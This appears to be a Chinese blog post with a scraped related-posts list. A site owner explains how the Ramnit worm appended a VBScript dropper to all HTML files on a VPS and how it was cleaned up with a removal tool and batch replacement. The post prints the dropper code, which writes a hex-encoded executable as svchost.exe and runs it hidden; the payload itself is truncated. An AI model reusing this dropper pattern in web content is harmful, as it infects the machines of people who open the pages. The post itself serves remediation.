html病毒DropFileName,王国平博客-HTML 感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒 查杀解决办法...
最近发现vps流量疯长 看了下统计 也没看到网站有大流量,查看源码才发现网页被添加了一段很长的js 内容大概是这样
DropFileName = “svchost.exe”
WriteData =
“4D5A0000200000000400000F00FFF.............................................此处省略N个字符串”
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//-->
到vps一看才发现 所有的 html 文件末尾都被加了一段这个代码把页面体积搞的很大 从而导致流量飙升,百度了一晚上没搞明白,第二天又搞了一天试过360杀毒根本没啥用,最后用赛门铁克的 Ramnit 蠕虫病毒 专杀工具给搞定了。下面说下解决方案
1、下载 赛门铁克的 Ramnit 蠕虫病毒 专杀工具
下载后直接运行 点 star 即可 全盘删完后会提示重启 点 yes 重启即可。
2、用专杀工具杀完以后随机检查了几个 html 文件发现还有那段代码,不过不会像之前自己手动删了 然后里面就又被自动加上了,这说明病毒已经被杀掉了可能是文件太多,专杀工具没有全都检测得到,不过没关系可以用批量查找替换工具 ultrareplace 把网站重新查找替换一下即可。
ultrareplace 下载地址:http://www.xiazaiba.com/html/4475.html
目前看上去是问题解决了,还需再观察几天,尽量不要在服务器下载运行来历不明的软件,及时打补丁安装防护工具。
html病毒DropFileName,王国平博客-HTML 感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒 查杀解决办法...相关推荐
- 蠕虫病毒html,HTML 感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒 查杀解决办法
参考: https://www.cnblogs.com/wuhairui/p/8297614.html http://www.guopingblog.com/post/100.html 最近发现vps ...
- 赛门铁克杀html病毒,HTML 感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒 查杀解决办法...
参考: https://www.cnblogs.com/wuhairui/p/8297614.html http://www.guopingblog.com/post/100.html 最近发现vps ...
- 感染 <SCRIPT Language=VBScript> DropFileName = “svchost.exe” Ramnit 蠕虫病毒 HTML清除工具
最近开发一个web项目,html文件在尾部老是自动生成一串乱码,如下图 网上搜了下是电脑已经感染了Ramnit 蠕虫病毒,搜了一遍专杀工具各种收费,基本放弃.无奈电脑有太多东西,重装又浪费时间,时间成 ...
- phpstorm正则匹配清理被蠕虫病毒污染的html文件DropFileName = “svchost.exe” Ramnit
电脑中毒了,本地的html文件全部被蠕虫病毒感染了.本地所有项目里面的html文件全部被破坏了,里面都插入了一个脚本,DropFileName = "svchost.exe" Ra ...
- 人生需要规划——感受徐小平 (转自徐小平博客)
周日晚上,看了世乒赛男单决赛王励勤对马琳的惊天大逆转之后,很是兴奋,过了午夜还睡不着,于是打开电视搜索有趣的节目,最后锁定三个频道轮换着看,一个 是第一财经的财富人生,叶蓉访谈徐小平;一个是央视四套百 ...
- 值得看一眼的80句好话----转自徐小平博客
上网,看到这么一个帖子,觉得很好.网间真是充满了好东西.转贴在这里和大家分享. 01.每天告诉自己一遍:我真的很不错. 02.生气是拿别人做错的事来惩罚自己 03.生活中若没有朋友,就像生活中没有 ...
- 怎样取消关注别人的csdn博客
今天不小心点错 关注了一个人的博客 可是怎么取消关注呢 找了半天 终于找到解决办法 0x01: 来到个人主页 (地址就是https://blog.csdn.net/用户名) 接着将鼠 ...
- Svchost.exe病毒
Svchost.exe是病毒的两种情况 1.利用假冒Svchost.exe名称的病毒程序 这种方式运行的病毒并没有直接利用真正的Svchost.exe进程,而是启动了另外一个名称同样是Svchost. ...
- Svchost.exe是病毒的两种情况
1.利用假冒Svchost.exe名称的病毒程序 这种方式运行的病毒并没有直接利用真正的Svchost.exe进程,而是启动了另外一个名称同样是Svchost.exe的病毒进程,由于这个假冒的病毒进程 ...
最新文章
- 什么叫dfs文件服务器,什么是DFS(分布式文件系统)以及DFS的优点
- cognos安装教程linux,linux环境下安装cognos10.2.1(菜鸟安装)
- 20151026c#2
- 2017ACM/ICPC亚洲区沈阳站 C Hdu-6219 Empty Convex Polygons 计算几何 最大空凸包
- 开源软件和自由软件_自由和开源软件的经济学
- 华为的数字化转型与数据治理
- Java集合性能分析-疯狂Java讲义
- k8s核心技术-Controller(Deployment)控制器对pod的管理实现_升级回滚和弹性伸缩---K8S_Google工作笔记0030
- unity5 静态和动态cubmap
- 【数据分析】Python-NumPy模块的使用
- ORG LegacyCell for Mac - MS-20/Polysix音频合成器
- Tampermonkey 实现 csdn 免登陆复制
- 软件测试的测试代码,软件测试(示例代码)
- 【PCB设计工具】在线 mil到mm单位转换、mm到mils换算
- java时区_Java时区的转换
- 老板说“把系统升级到https”,我用一个脚本实现了,而且永久免费!​
- UI设计师福利之手把手打造SVG动画应用的微场景
- hadoop离线阶段(第十三节)数据仓库、hive简介、hive安装和hive的三种交互模式
- python 模拟登录公众号平台,主动推消息等一系列操作
- 卡莱特led显示屏调试教程_卡莱特5A接收调屏步骤.doc